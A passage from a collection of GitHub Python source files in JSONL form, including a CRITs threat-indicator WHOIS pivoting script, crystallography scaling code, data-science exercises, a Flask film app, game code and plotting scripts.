new_ind['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered')\n\n # Now we can add the rest of the WHOIS indicators (if necessary)\n for ind in crits_indicators_to_add:\n # If the indicator exists, just get the id and use it to build\n # relationships. We will look for one with the same source.\n # If not in CRITs, add it and relate it.\n whois_indicator = crits_mongo.find_one(\n 'indicators',\n {\n 'value': ind['value'],\n 'type': ind['type'],\n 'source.name':\n config.crits.default_source,\n })\n if not whois_indicator:\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n whois_indicator = crits.add_indicator(\n value=ind['value'],\n itype=ind['type'],\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # This is pretty hacky - Since we use both the raw DB and the\n # API, we might receive either an '_id' or an 'id' back. We\n # are going to standardize on 'id', rather than '_id'\n if 'id' not in whois_indicator:\n if '_id' not in whois_indicator:\n print(repr(whois_indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in whois indicator'.format(query))\n whois_indicator['id'] = whois_indicator['_id']\n\n # Not a huge deal, but make sure we don't waste time adding\n # a relationship to itself\n if whois_indicator['id'] == new_ind['id']:\n continue\n # The CRITs API allows us to add a campaign to the indicator,\n # but not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n # Continue with the same campaign\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n whois_indicator['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered')\n\n# Add a bucket_list item to track that we searched for this whois indicator\nif args.crits:\n crits_mongo.add_bucket_list_item(indicator['id'], 'indicators',\n 'pt:whois_search_completed')\n\n# SORT BY DATE\nformatted_results = sorted(formatted_results, key=itemgetter(3), reverse=True)\n# Row contains:\n# Domain, Registrant Email, Registrant Name, Registrant Telephone,\n# Registrant Date, Expiration Date, Tags\nheaders = ['Domain', 'Registrant Email', 'Registrant Name',\n 'Registrant Telephone', 'Registrant Date', 'Expiration Date',\n 'Tags']\nprint(tabulate.tabulate(formatted_results, headers))\n","repo_name":"IntegralDefense/ptauto","sub_path":"bin/pt_query.py","file_name":"pt_query.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"}
+{"seq_id":"18713877002","text":"\n__author__ = [\"S. Basu\"]\n__license__ = \"M.I.T\"\n__date__ = \"28/07/2017\"\n__refactordate__ = \"10/05/2021\"\n\nimport os, sys,glob\nimport logging\nfrom src.abstract import Abstract\nfrom src.xscale_output import OutputParser\n\nlogger = logging.getLogger('sxdm')\n\nclass ScaleUtils(Abstract):\n\n def find_corrects(self, inData):\n self.results['listofCORRECTfiles'] = []\n try:\n for fname in inData['listofHKLfiles']:\n folder = os.path.dirname(fname)\n path = os.path.join(folder, 'CORRECT.LP')\n\n if os.path.isfile(path):\n self.results['listofCORRECTfiles'].append(path)\n\n else:\n logger.info('CORRECT.LP could not be found in %s' %folder)\n self.setFailure()\n except KeyError:\n self.setFailure()\n return\n\n def check_bfactor(self, inData):\n self.find_corrects(inData)\n bfac_dicts = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n fh = open(cor_name, 'r')\n _all = fh.readlines()\n fh.close()\n xasci = fname\n for lines in _all:\n if \"WILSON LINE\" in lines:\n line = lines.split()\n try:\n bfac_dicts[xasci] = float(line[9])\n except Exception:\n logger.info('B-factor might be negative, not considered')\n else:\n pass\n\n self.results['bfac_sorted_hkls'] = sorted(bfac_dicts.items(), key=lambda x : x[1])\n return\n\n def rank_rmeas(self, inData):\n self.find_corrects(inData)\n rmeas_dict = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n indict = {'CORRECT_file': cor_name}\n correct_parse = OutputParser(indict)\n correct_parse.parse_xds_stats(indict)\n mean_rmeas = correct_parse.mean_rmeas_calc(correct_parse.results['xds_stat'])\n rmeas_dict[fname] = mean_rmeas\n\n self.results['rmeas_sorted_hkls'] = sorted(rmeas_dict.items(), key=lambda x:x[1])\n return\n\n\n def ref_choice(self, inData):\n reference = None\n if inData['fom'] == 'bfac':\n self.check_bfactor(inData)\n try:\n reference = self.results['bfac_sorted_hkls'][0][0]\n\n except (IndexError, ValueError):\n err = 'bfactor selection may not work'\n logger.error(err)\n self.setFailure()\n\n\n elif inData['fom'] == 'rmeas':\n self.rank_rmeas(inData)\n try:\n reference = self.results['rmeas_sorted_hkls'][0][0]\n except (IndexError, ValueError):\n err = 'Rmeas based referenceing may not have worked'\n logger.error(err)\n self.setFailure()\n else:\n pass\n self.results['reference'] = reference\n return\n\n def Bfact_sorter(self, inData):\n bfac_sorted_hkls = []\n self.check_bfactor(inData)\n if len(self.results['bfac_sorted_hkls']) > 0:\n for i in range(len(self.results['bfac_sorted_hkls'])):\n bfac_sorted_hkls.append(self.results['bfac_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n\n self.results['bfact_sorted_hkls'] = bfac_sorted_hkls\n return\n\n def rmeas_sorter(self, inData):\n rmeas_sorted_hkls = []\n self.rank_rmeas(inData)\n if len(self.results['rmeas_sorted_hkls']) > 0:\n for i in range(len(self.results['rmeas_sorted_hkls'])):\n rmeas_sorted_hkls.append(self.results['rmeas_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n self.results['rmeas_sorted_hkls'] = rmeas_sorted_hkls\n return\n\ndef main():\n hklpaths = glob.glob(os.path.join(sys.argv[1], 'XDS_ASCII.HKL'))\n inData = dict()\n inData['listofHKLfiles'] = hklpaths\n sc = ScaleUtils(inData)\n sc.rmeas_sorter(inData)\n print(sc.results['rmeas_sorted_hkls'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"shibom/sxdm","sub_path":"src/scale_utl.py","file_name":"scale_utl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"3314307710","text":"import warnings#忽略警告提示\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\n\ntrain=pd.read_csv('train.csv')\ntest=pd.read_csv('test.csv')\nprint('训练数据集:',train.shape,'测试数据集',test.shape)\n\nrowNum_train=train.shape[0]\nrowNum_test=test.shape[0]\nprint('训练集行数:',rowNum_train)\nprint('测试集行数',rowNum_test)\n\nfull_df=train.append(test,ignore_index=True)\nprint('合并后的数据集:',full_df.shape)\n\nprint(full_df.head())#打印前几行\nprint(full_df.describe())#查看数据的统计信息\nprint(full_df.info())#查看每一列的数据类型,数据总数,以及是否有数据缺失\n\nfull_df['Fare']=full_df['Fare'].fillna(full_df['Fare'].mean())\nfull_df['Age']=full_df['Age'].fillna(full_df['Age'].mean())#把年龄和费用(票价)用均值来替代\nprint(full_df['Embarked'].mode())#查看Embark这一列的众数\nfull_df['Embarked']=full_df['Embarked'].fillna(full_df['Embarked'].mode())\n\nprint(full_df.info())\nsex_mapDict={'male':1,'female':0}\nfull_df['Sex']=full_df['Sex'].map(sex_mapDict)\nprint(full_df.head())\n\nembarkedDF=pd.DataFrame()\nembarkedDF=pd.get_dummies(full_df['Embarked'],prefix='Embarked')#使用get_dummies进行one-hot编码,列名前缀是Embarked\nprint(embarkedDF.head())\n\nfull=pd.concat([full_df,embarkedDF],axis=1)#因为这里用了登船港口(Embarked)进行了one-hot编码产生了它的虚拟变量,所以这里把它删掉\nfull.drop('Embarked',axis=1,inplace=True)\nprint(full.head())\nprint(full.shape)\n\nname1='Braund, Mr. Owen Harris'\nstr1=name1.split(',')[1]\nstr2=str1.split('.')[0]\nstr3=str2.split()\n\ndef getTitle(name):\n str1 = name1.split(',')[1]\n str2 = str1.split('.')[0]\n str3 = str2.strip()\n return str3\n\n\n\ntitleDF=pd.DataFrame()\ntitleDF['Title']=full['Name'].map(getTitle)\nprint(titleDF.head())\n\n# full=pd.concat([full,titleDF],axis=1)\n#\n# full.drop('Name',axis=1,inplace=True)\n# print(full.head)\n#\n# corrDF=full.corr()\n# print(corrDF)\n#\n# print(corrDF['Survived'].sort_values(ascending=False))\n#\n# full_X=pd.concat([titleDF],axis=1)\n# print(full_X.head())","repo_name":"2981047480/zephyr","sub_path":"大二机器学习记录/泰坦尼克数据/算法.py","file_name":"算法.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"8966484604","text":"#importowanie wszystkich potrzebnych bibliotek i plików\nfrom GameParameters import *\nfrom ursina import *\nfrom Player import *\nfrom Train import *\nfrom Menu import *\nfrom screeninfo import get_monitors\nfrom train_spawner import *\nfrom high_scores import *\n\nGameParameters.paused = True\n#ustawianie pełnego ekranu\nmonitor = get_monitors()\napp = Ursina(fullscreen=True)\nwindow.size = Vec2(monitor[0].width, monitor[0].height)\nwindow.fps_counter.disable()\n#incjalizacja obiektów\nplayer = Player(collider='box', model='cube', position=(0, 0, 0))\nmain_menu = Menu(player)\nfor i in range(8):\n ground = Entity(model='/assets/tunele.glb', collider='box', scale=0.67, position=(0, -7, 110 *i))\n#światło bezpośrednio nad graczem\nL = PointLight(y = 10, x = 0, z = 0, color = color.white, shadows = True)\nplayer.menu = main_menu\n#wygenerowanie początkowych pociągów\nGameParameters.train += train_generator_init(player)\n#ustawienie głośnosci\nAudio.volume_multiplier = 0.5\n\ndef update():\n #przy śmierci usuwanie pociągów i wyświetlanie menu śmierci\n if GameParameters.death == True and GameParameters.paused == False:\n for i in GameParameters.train:\n i.disable()\n GameParameters.train.clear()\n main_menu.death_menu(player)\n #zwiększanie wyniku i szybkości\n if GameParameters.paused == False:\n GameParameters.score += int(time.dt * 100)\n main_menu.score_point.text = \"Score:\" + str(GameParameters.score)\n GameParameters.speed += 0.01\n #pojawianie się pociągów\n if (GameParameters.can_spawn == True and GameParameters.paused == False):\n GameParameters.train += train_generator(player)\n GameParameters.can_spawn = False\n\n#tekstura nieba\nSky(texture='assets/night.jpg')\napp.run()\n","repo_name":"BartoszKaca/subway_clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"9948245835","text":"import os\nimport shutil\n\nfrom populus import ASSETS_DIR\n\nfrom populus.config.helpers import (\n check_if_json_config_file_exists,\n)\n\nfrom populus.utils.filesystem import (\n ensure_path_exists,\n)\n\nfrom populus.project import (\n Project,\n)\n\nGREETER_SOURCE_PATH = os.path.join(ASSETS_DIR, 'Greeter.sol')\nGREETER_TEST_PATH = os.path.join(ASSETS_DIR, 'test_greeter.py')\n\n\ndef init_project(project_dir, logger):\n\n if project_dir is None:\n project_dir = os.getcwd()\n else:\n project_dir = os.path.abspath(project_dir)\n\n has_json_config = check_if_json_config_file_exists(project_dir)\n\n if has_json_config:\n logger.info(\n \"Found existing `project.json` file. Not writing default config.\"\n )\n\n project = Project(project_dir, create_config_file=True)\n logger.info(\n \"Wrote default populus configuration to `./{0}`.\".format(\n os.path.relpath(project.config_file_path),\n )\n )\n\n for source_dir in project.contracts_source_dirs:\n if ensure_path_exists(source_dir):\n logger.info(\n \"Created Directory: ./{0}\".format(\n os.path.relpath(source_dir)\n )\n )\n\n example_contract_path = os.path.join(project.contracts_source_dirs[0], 'Greeter.sol')\n if not os.path.exists(example_contract_path):\n shutil.copy(GREETER_SOURCE_PATH, example_contract_path)\n logger.info(\"Created Example Contract: ./{0}\".format(\n os.path.relpath(example_contract_path)\n ))\n\n tests_dir = os.path.join(project.project_dir, 'tests')\n if ensure_path_exists(tests_dir):\n logger.info(\"Created Directory: ./{0}\".format(os.path.relpath(tests_dir)))\n\n example_tests_path = os.path.join(tests_dir, 'test_greeter.py')\n if not os.path.exists(example_tests_path):\n shutil.copy(GREETER_TEST_PATH, example_tests_path)\n logger.info(\"Created Example Tests: ./{0}\".format(\n os.path.relpath(example_tests_path)\n ))\n\n return project\n","repo_name":"veox/populllus","sub_path":"populus/api/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"16995593840","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('kingfisher.jpg', cv2.IMREAD_COLOR)\n\n# Draw a line on the image\ncv2.line(img, (10,10), (600, 700), (255,255,255), 10)\n\n# Draw a rectangel on the image\n\ncv2.rectangle(img, (10, 15), (250, 300), (155, 100, 10), 5)\n\n# Draw a circle\n\ncv2.circle(img, (225, 335), 100,(0,100, 25) , -1 )\n\n# Draw a polygon\n\npts = np.array([[10, 10], [25, 30], [50, 65], [70, 80], [80, 10]], np.int32)\ncv2.polylines(img, [pts], True, (200,15,100))\n\n# Write a text in the image\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Kingfisher image', (1,100), font, 1, (201, 222, 100), 2, cv2.LINE_AA)\n\n# plotting from cv2\n\ncv2.imshow('image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"Nirkan/Computer-Vision-Python","sub_path":"OpenCV-Tutorials/opcv3.py","file_name":"opcv3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"75354972691","text":"import os\nfrom pdb import set_trace\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nimport pdb\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres://imperial:imperial-fdt-online-2019-colossal-shelf@imperial-2021.ckp3dl3vzxoh.eu-west-2.rds.amazonaws.com:5432/dvdrental\"\ndb = SQLAlchemy(app)\n\n\n\nclass Inventory(db.Model):\n film_id = db.Column(db.Integer(), primary_key=True)\n inventory_id = db.Column(db.Integer(), ForeignKey('film.film_id'))\n store_id = db.Column(db.Integer())\n\n def __repr__(self):\n return 'Inventory ID: '+str(self.inventory_id)\n\nclass Film(db.Model):\n __tablename__ = 'film'\n film_id = db.Column(db.Integer, primary_key=True)\n\n title = db.Column(db.String(255), index=True, unique=True)\n description = db.Column(db.String())\n\n copies = relationship('Inventory')\n\n\n def __repr__(self):\n return 'FILM: title is ' + self.title\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return \"Hello, World?\"\n\n\n\n\n\n@app.route('/films')\ndef films():\n films = Film.query.all()\n\n # print(films[0].description)\n\n return render_template('films.html', films = films)\n\n\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\n","repo_name":"PrashantLonikar/assignment5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33970922302","text":"def json_prep(items):\n \"\"\"Convert a model-type object into a JSON-serializable object.\n\n Keyword Arguments:\n items -- the model-type object to be converted.\n \"\"\"\n\n # If the object is a list, convert it to a list of dictionaries.\n if isinstance(items, type([])):\n prepped = []\n for item in items:\n prepped_item = {\n 'id': item.id,\n 'name': item.name,\n 'sport': item.sport,\n 'category': item.category,\n 'description': item.description,\n 'date': item.date,\n 'user': item.user.username\n }\n prepped.append(prepped_item)\n return {'items': prepped}\n\n # If the object is not a list, convert it to a dictionary.\n else:\n prepped = {\n 'id': items.id,\n 'name': items.name,\n 'sport': items.sport,\n 'category': items.category,\n 'description': items.description,\n 'date': items.date,\n 'user': items.user.username\n }\n return {'item': prepped}\n","repo_name":"davidhammaker/Item_Catalog","sub_path":"item_catalog/jsons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5774877610","text":"from django.db import models\nfrom edc_base.model_mixins import BaseUuidModel\nfrom edc_base.sites.site_model_mixin import SiteModelMixin\n\nfrom .contracting import Contracting\n\n\nclass JobPerformanceKpa(BaseUuidModel, SiteModelMixin, models.Model):\n\n contracting = models.ForeignKey(\n Contracting,\n on_delete=models.PROTECT)\n\n key_performance_area = models.CharField(\n verbose_name='KEY PERFORMANCE AREAS',\n max_length=100)\n\n kpa_tasks = models.TextField(\n verbose_name='TASKS',\n max_length=1000)\n\n kpa_performance_indicators = models.TextField(\n verbose_name='PERFORMANCE INDICATORS'\n '(completion dates)',\n max_length=1000)\n\n skills_required = models.TextField(\n verbose_name=\"SKILLS REQUIRED\",\n max_length=100)\n\n class Meta:\n verbose_name = 'Job Performance KPA'\n verbose_name_plural = 'Job Performance KPA'\n","repo_name":"Botswana-Harvard-Utility-Systems/bhp-personnel","sub_path":"bhp_personnel/models/job_performance_kpa.py","file_name":"job_performance_kpa.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5124537764","text":"from sqlalchemy import case\nfrom flaskapp.models import Restaurant, MenuItem, Courses\nfrom flaskapp import db\n\n\nclass DBAccess:\n @staticmethod\n def getRestaurant(restaurantId: int) -> Restaurant:\n return db.session.query(Restaurant) \\\n .filter_by(id=restaurantId).first()\n\n @staticmethod\n def getMenuItem(menuId: int) -> MenuItem:\n return db.session.query(MenuItem).filter_by(id=menuId).first()\n\n @staticmethod\n def getRestaurants():\n return db.session.query(Restaurant).order_by(Restaurant.name)\n \n @staticmethod\n def getCourses(restaurantId: int):\n sort_order = case(value=MenuItem.course, whens=Courses)\n return db.session.query(MenuItem.course).distinct().filter_by(\n restaurant_id=restaurantId).order_by(sort_order)\n\n @staticmethod\n def getMenuItems(restaurantId: int):\n return db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId)\n\n @staticmethod\n def getMenuItemsByCourse(restaurantId: int):\n return [(course[0], db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId,\n course=course[0]))\n for course\n in DBAccess.getCourses(restaurantId)]\n\n @staticmethod\n def createNewRestaurant(name: str):\n new_restaurant = Restaurant(\n name=name)\n db.session.add(new_restaurant)\n db.session.commit()\n\n @staticmethod\n def createNewMenuItem(restaurantId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n new_menu_item = MenuItem(\n name=name,\n price=price,\n description=description,\n restaurant_id=restaurantId,\n course=course,\n )\n db.session.add(new_menu_item)\n db.session.commit()\n\n @staticmethod\n def renameRestaurant(restaurantId: int, name: str):\n restaurant = DBAccess.getRestaurant(restaurantId)\n restaurant.name = name\n db.session.commit()\n\n @staticmethod\n def editMenuItem(menuId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n menu_item = DBAccess.getMenuItem(menuId=menuId)\n menu_item.name = name\n menu_item.price = price\n menu_item.description = description\n menu_item.course = course\n db.session.commit()\n\n @staticmethod\n def deleteRestaurant(restaurantId: int):\n db.session.delete(DBAccess.getRestaurant(restaurantId))\n db.session.commit()\n\n @staticmethod\n def deleteMenuItem(menuId: int):\n db.session.delete(DBAccess.getMenuItem(menuId=menuId))\n db.session.commit()\n","repo_name":"hgihem/FlaskTutorial","sub_path":"flaskapp/database_access.py","file_name":"database_access.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6496892371","text":"'''Comprehension'''\n# синтаксический сахар - упращение кода\n\n# генерация последовательности в одну строку используя цикл (синтаксический сахар)\n\n# list, set, dict\n'''Синтаксис'''\n# result for element in iterable_object\n# result for element in iterable_object if filter \n\n'''====== LIst comprehension ======'''\n''' Упрощенный подход к созданию списка, задействует цикл for и if-else. Работает быстрее чем обычный'''\n# \n\n''' for '''\n# list_=[]\n# for i in range(11):\n# list_.append(i)\n# print(list_)\n\n# a=list((i for i in range(11)))\n# print(a)\n\n# list_=[i for i in range(11)]\n# print(list_)\n# '''#\n'''засекаем время'''\n# import time\n# start_time= time.time()\n\n# list_=[]\n# for i in range(100000):\n# list_.append(i)\n# time1= time.time()- start_time\n\n# start_time = time.time()\n# list_2=[i for i in range(11)]\n# time2= time.time()- start_time\n# print( time1, time2)\n\n''' if '''\n# \n# list_=[]\n# for i in range(11):\n# if i%2==0:\n# list_.append(i)\n# print(list_)\n\n# list_2=[i for i in range(11) if i%2==0]\n# print(list_2)\n# \n\n# list_2=[i for i in range(0,11,2)]\n# print(list_2)\n\n# list_2=[i for i in range(11) if not i%2]\n# print(list_2)\n\n\n# a=['hello'for i in range(10)]\n# print(a) #['hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello']\n\n# print([input() for i in range(2)]) на каждой итерации запрашивает ввод(input)\n\n''' if- else . Если в условии нужен else, то все условие пишется перед for'''\n# list_2=[i if not i%2 else 'hello' for i in range(11) ]\n# print(list_2) #[0, 'hello', 2, 'hello', 4, 'hello', 6, 'hello', 8, 'hello', 10]\n'''задача '''\n# list_1 =[1,'hello', 3, 'a', 4.0, 6, 8, 'hw']\n# l=['четное' if i%2==0 else 'нечетное' for i in list_1 if type(i)==int or type(i)== float]\n# print(l) #['нечетное', 'нечетное', 'четное', 'четное', 'четное']\n\n\n\n''' set comprehension'''\n# почти тоже самое как и представление списков(list comprehension)\n# Используются {} скобки, не содержит дубликатов, не гарнтирует сохранность элементов в порядке\n\n# list_=[1,2,3,4,5,4,5,3,2]\n# set_={i for i in list_}\n# print(set_) #{1, 2, 3, 4, 5}\n\n# set_= set()\n# for i in list_:\n# set_.add(i)\n# print(set_)\n\n''' dict comprehension'''\n# необходимо дополнительно определить ключ\n\n# dict_={i: i for i in range(10)}\n# print(dict_) #{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}\n\n# dic={}\n# for i in range(10):\n# dic.update({i: i**2})\n# print(dic) #{0: 0, 1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64, 9: 81}\n\n# l=[1,1,2,3,2,2,3,4,5]\n# li={i: l.count(i) for i in l}\n# print(li) #{1: 2, 2: 3, 3: 2, 4: 1, 5: 1}\n\n# d={'a':2, 'b':3}\n# l={k: 'четное' if v%2==0 else 'нечетное' for k,v in d.items() }\n# print(l) #{'a': 'четное', 'b': 'нечетное'}\n'''создать словарь, где ключи- это числа от 1 до 10, а значения эти же числа в виде строки'''\n# d={i: str(i) for i in range(1,11)}\n# print(d)\n\n''''''\n# l1=[1,2,3,4,5]\n# l2=['a','b','c','d','e']\n# d={ l1[i]: l2[i] for i in range(len(l1))}\n# print(d) #{1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e'}\n\n\n''' вложенные comprehension'''\n# d={i: list(range(1,i+1)) for i in range(1,6)}\n# print(d)\n\n# d={i: [j for j in range(1,i+1)] for i in range(1,6)} # вложенность\n# print(d)\n\n''''''\n# l=[['hello world' for i in range(5)] for j in range(10)]\n# print(l)\n\nemployees = {\n 'id1': {\n 'first name': 'Александр',\n 'last name' : 'Иванов',\n 'age': 30,\n 'job':'программист'\n },\n 'id2': {\n 'first name': 'Ольга',\n 'last name' : 'Петрова',\n 'age': 35,\n 'job':'ML-engineer'\n }}\n# for info in employees.values():\n# for k,v in info.items():\n# if k=='age':\n# info[k] = float(v)\n# print(employees)\n\n# print({id_: {k: float(v) if k=='age' else v for k,v in info.items()} for id_, info in employees.items()})\n# # info == {k: float(v) if k=='age' else v for k,v in info.items()}","repo_name":"clara8luna/lessons_py_27_ev","sub_path":"comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"28848963243","text":"class Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n \n if not timeSeries: return 0\n \n poisoned_time = 0\n for i in range(len(timeSeries)-1):\n poisoned_time += min(duration, timeSeries[i+1] - timeSeries[i])\n \n return poisoned_time + duration\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-09/26-Teemo-Attacking.py","file_name":"26-Teemo-Attacking.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"}
+{"seq_id":"31482701896","text":"from django.contrib.sites.shortcuts import get_current_site\n\n\nclass SiteFilteredViewMixin(object):\n\n site_field = 'site'\n\n def get_queryset(self):\n qs = super(SiteFilteredViewMixin, self).get_queryset()\n kwargs = {\n self.site_field: get_current_site(self.request),\n }\n return qs.filter(**kwargs)\n","repo_name":"fdemmer/airavata","sub_path":"airavata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"72764200210","text":"from PyQt5 import QtWidgets, uic, QtCore\nimport sys, os, glob, json\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('UiTOF.ui', self) # Load the .ui file\n self.searchB.clicked.connect(self.click_s)\n self.exeB.clicked.connect(self.exe)\n self.scrfold = (\"/home/mgiacalo/GitHub/\",\"/home/mgiacalo/alice/alidist/\")\n self.diction = {}\n paths, names = self.getFiles()\n dictL = {names[i]: paths[i] for i in range(len(paths))}\n self.setupDict(dictL)\n names.sort()\n self.fillCombo(names)\n\n self.show() # Show the GUI\n \n def fillCombo(self, fill):\n self.comboBox.addItems(fill) \n\n def click_s(self):\n index = self.comboBox.findText(self.lsearch.text(), QtCore.Qt.MatchFixedString|QtCore.Qt.MatchContains)\n if index != -1:\n self.comboBox.setCurrentIndex(index)\n else: \n self.lsearch.setText(\"Not FOUND\") \n\n def setupDict(self, Dict):\n self.diction = Dict\n\n def exe(self):\n print(self.diction[self.comboBox.currentText()]) \n\n def getFiles(self):\n paths = []\n names = []\n for fol in self.scrfold:\n os.chdir(fol)\n for file in glob.glob(\"*.sh\"):\n paths.append(fol + file)\n names.append(file) \n return paths, names \n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_() ","repo_name":"jackal1-66/UiTOF","sub_path":"UiTOF_V3.py","file_name":"UiTOF_V3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"34714430087","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport seaborn as sns\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\n\nsns.set()\nregister_matplotlib_converters()\n\n# sets up pandas table display\npd.set_option('display.width', 500)\npd.set_option('display.max_columns', 100)\npd.set_option('display.notebook_repr_html', True)\npd.options.mode.chained_assignment = None\nfont = {'family': 'normal',\n 'weight': 'bold',\n 'size': 22}\nLNW = 2\nFNTSZ = 14\nLGNDSZ = 14\nmpl.rcParams['xtick.labelsize'] = LGNDSZ\nmpl.rcParams['ytick.labelsize'] = LGNDSZ\nSTART = '2011-01-01'\nSTOP = '2011-12-31'\nX_TEXT = 0.97\nY_TEXT = 0.98\n\nALK_VAR = 'B_C_Alk'\nALKFLUX_VAR = 'B_C_Alk _flux'\n\n\ndef addseason(datestring):\n \"\"\"Classifies season\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n if 2 < item.month < 6:\n return 'spring'\n elif 5 < item.month < 9:\n return 'summer'\n elif 8 < item.month < 12:\n return 'autumn'\n else:\n return 'winter'\n\n\ndef addmonth(datestring):\n \"\"\"Classifies month\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n year = {1: 'january', 2: 'february', 3: 'march', 4: 'april',\n 5: 'may', 6: 'june', 7: 'july', 8: 'august', 9: 'september',\n 10: 'october', 11: 'november', 12: 'december'}\n return year[item.month]\n\n\ndef addseconds(datestring):\n t = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addsecondstolvl(datestring):\n datestring = datestring[0:-4]\n t = datetime.strptime(datestring, \"%d/%m/%Y %H:%M:%S\")\n return (t - datetime(2017, 1, 